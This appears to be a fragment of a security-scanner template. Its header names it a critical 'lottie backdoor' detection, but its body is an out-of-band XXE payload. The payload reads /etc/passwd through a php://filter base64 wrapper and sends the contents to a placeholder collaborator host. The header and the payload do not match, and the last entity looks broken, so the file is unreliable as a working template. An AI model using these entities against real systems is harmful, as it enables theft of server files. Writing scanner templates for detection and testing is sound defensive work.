id: backdoor-lottie-detection
name: detect-lottie-backdoor
author: nagli-wiz-research
severity: critical
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://<COLLAB_URL>?%data;'>">
<!ENTITY % d SYSTEM "php://filter/convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % c "<!ENTITY rrr SYSTEM ';'>">